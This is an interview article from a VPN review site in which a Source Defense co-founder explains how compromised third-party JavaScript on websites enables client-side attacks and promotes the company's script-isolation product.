We review vendors based on rigorous testing and research but also take into account your feedback and our affiliate commission with providers. Some providers are owned by our parent company.
Learn more
vpnMentor was established in 2014 as an independent site reviewing VPN services and covering privacy-related stories. Today, our team of hundreds of cybersecurity researchers, writers, and editors continues to help readers fight for their online freedom in partnership with Kape Technologies PLC, which also owns the following products: ExpressVPN, CyberGhost, and Private Internet Access which may be ranked and reviewed on this website. The reviews published on vpnMentor are believed to be accurate as of the date of each article, and written according to our strict reviewing standards that prioritize the independent, professional and honest examination of the reviewer, taking into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings and reviews we publish may also take into consideration the common ownership mentioned above, and affiliate commissions we earn for purchases through links on our website. We do not review all VPN providers and information is believed to be accurate as of the date of each article.
Advertising Disclosure

vpnMentor was established in 2014 as an independent site reviewing VPN services and covering privacy-related stories. Today, our team of hundreds of cybersecurity researchers, writers, and editors continues to help readers fight for their online freedom in partnership with Kape Technologies PLC, which also owns the following products: ExpressVPN, CyberGhost, and Private Internet Access which may be ranked and reviewed on this website. The reviews published on vpnMentor are believed to be accurate as of the date of each article, and written according to our strict reviewing standards that prioritize the independent, professional and honest examination of the reviewer, taking into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings and reviews we publish may also take into consideration the common ownership mentioned above, and affiliate commissions we earn for purchases through links on our website. We do not review all VPN providers and information is believed to be accurate as of the date of each article.

3rd Party Scripts Are Jeopardizing Your Business, Source Defense is Here to Help

Ditsa Keren Technology Researcher

Source Defense is the first and only company to offer a real time SAAS solution that protects websites from vulnerabilities introduced through the website supply chain. We've interviewed VP Product and co-founder Avital Grushcovski in order to understand what is the problem with third party scripts, and how it can be avoided. Here's what we found.

What is your main objective at Source Defense?

Websites today typically operate with many third-party vendors scripts integrated onto the website.  These scripts are designed to enable rich content capability and provide measures of website performance and efficiency.  These include analytics, advertising, chat services, social media applications, etc. However, they introduce a problem, because they function outside of the website security perimeter, which is focused on the communication between the user and the website server.  This security generally includes firewalls and WAFs which focus on protecting the server-side of the website session.

These third-party scripts operate outside of this security perimeter and introduce a very real client-side vulnerability that is not currently addressed.  These scripts are designed to communicate with remote servers which are managed by third-party service providers, completely external to the organization's security infrastructure. Some of the big names include Google, and Facebook, but many smaller third party vendors offer compelling capabilities that are broadly deployed and enhance web experience or enrich analytics.

Unfortunately, when these third-party vendors are compromised the resultant attacks can, in turn, compromise all of the organizations that have integrated the services of this third-party vendor.  We’ve seen many and recent examples of this attack type including the April, 2018 breach of Delta, Best Buy, Sears and Kmart that originated from the compromised service of a reputable third-party vendor JavaScript they had all deployed on their websites.  A significant volume of credit card data was stolen which has resulted in significant remediation costs and reputational damage to these prominent vendors.

If we consider that the origin of JavaScript has no effect over the level of access it has to the page. That every script can add/remove data from the page, perform unwanted actions and even record keystrokes as the user types them. The lack of control over how JavaScript is designed to function makes third-party JS an increasingly popular attack vector for hackers.

Today’s solutions are focused around “detecting” this problem post-breach. Source Defense has architected an entirely new approach introducing a paradigm shift focused on preventing this type of attack in real-time through a first of its kind isolation and segmentation technology.  Source Defense’s cloud-based SaaS solution allows administrators to assign default or highly customizable policies to every third-party script operating on their webpage.

As an example, an analytics plugin tool can be controlled to ensure it has read-only access to the webpage content.  Should this tool become compromised, the assigned policy permissions, deployed via Source Defense, will ensure that malicious activities like adding unwanted content are prevented. Similarly, an ad service, once protected by Source Defense, will only be able to display ads in their designated areas and not be able to create any malicious phishing overlays.

The Source Defense solution was purposefully built for deployment and administration simplicity. Machine intelligence is leveraged to evaluate deployed third-party scripts and assigns default policies per third party service. Additionally, ongoing administration is extremely low requiring little oversight beyond accepting policies for newly deployed third party scripts.  Machine learning ensures that these default policies are generally effective. However, these policies may be customized if required.

We consider the Source Defense solution as both a compelling security solution as well as a critical business enablement tool.  It allows organizations to quickly and securely deploy third-party tools that enable rich content and capability to their websites.

How has the transition from analog to digital changed the game for financial institutions?

If you look at financial websites ten years ago you'd see few if any, third-party scripts operating on corporate websites. Today, third-party integrations are commonly deployed. The typical bank will have 20-40 third-party scripts operating simultaneously.

Security teams constantly struggle with the challenge of quickly activating the capabilities of these third-party vendors while ensuring the security of the website.

Financial organizations often choose to integrate third-party services onto their websites from well-known and established vendors, because they consider them more secure. This creates conflict between the marketing and security teams because innovative new tools often require extended security validation and jeopardize time to market.

Tag management platforms enable seamless addition of scripts to web pages with a simple user interface. When financial institutions put these tools in the wrong hands the goal of enhancing efficiency may come at great cost due to the exposure to non-validated scripts and tools introduced to organizations.

Financial institutions protected by Source Defense can confidently deploy third-party tools to their websites without exposing their organizations to vulnerabilities introduced by their scripts.  These tools can be implemented quickly and securely.

As blockchain technology is gaining popularity, how would you advise financial entrepreneurs to protect their user data?

Source Defense advises paying increased attention and care to vulnerabilities appearing on the client (browser) side. These developing websites may handle large transactions, and uncontrolled third-party scripts running on web pages can lead to significant losses. My recommendation would be to either implement a solution capable of managing these third-party entities or limit their use as much as possible.

In your opinion, should the Internet be regulated? How?

I don't think the Internet should not be regulated.  However, this answer depends on a discussion of "regulated". There's a great risk that simple regulation will evolve very quickly to censorship. That said, I do believe that there are websites that should be taken down and handled. I wouldn’t have ISPs blocking applications, because that's a very slippery slope.  However, it's clear that some sort of investigative authority should be funded and supported by governments to avoid some of the unfortunate content and transactions that are enabled by an unmonitored Internet.

What can you tell us about Source Defense's future plans?

We're a fast-growing startup with a first of its kind solution that addresses a very compelling and real threat vector that nearly every organization with a website faces today.  Many recent breaches have highlighted the need for this solution. As such, we are engaged in multiple pilots with large multinational organizations and Fortune-500 companies. Our future will see Source Defense expand more deeply into privacy and security, expand integrations and expand support for key compliance requirements like those evident in GDPR.  We will remain steadfast in our core goal of assisting organizations with secure business enablement.

We plan to open our new headquarters in the US and plan to significantly grow operations there in the near future.

We review vendors based on rigorous testing and research but also take into account your feedback and our affiliate commission with providers. Some providers are owned by our parent company.
Learn more
vpnMentor was established in 2014 as an independent site reviewing VPN services and covering privacy-related stories. Today, our team of hundreds of cybersecurity researchers, writers, and editors continues to help readers fight for their online freedom in partnership with Kape Technologies PLC, which also owns the following products: ExpressVPN, CyberGhost, and Private Internet Access which may be ranked and reviewed on this website. The reviews published on vpnMentor are believed to be accurate as of the date of each article, and written according to our strict reviewing standards that prioritize the independent, professional and honest examination of the reviewer, taking into account the technical capabilities and qualities of the product together with its commercial value for users. The rankings and reviews we publish may also take into consideration the common ownership mentioned above, and affiliate commissions we earn for purchases through links on our website. We do not review all VPN providers and information is believed to be accurate as of the date of each article.

About the Author

Ditsa Keren is a cybersecurity expert with a keen interest in technology and digital privacy.

Did you like this article? Rate it!
I hated it! I don't really like it It was ok Pretty good! Loved it!
out of 10 - Voted by users
Thank you for your feedback

Please, comment on how to improve this article. Your feedback matters!

Leave a comment

Sorry, links are not allowed in this field!

Name should contain at least 3 letters

The field content should not exceed 80 letters

Sorry, links are not allowed in this field!

Please enter a valid email address

Thanks for submitting a comment, %%name%%!

We check all comments within 48 hours to ensure they're real and not offensive. Feel free to share this article in the meantime.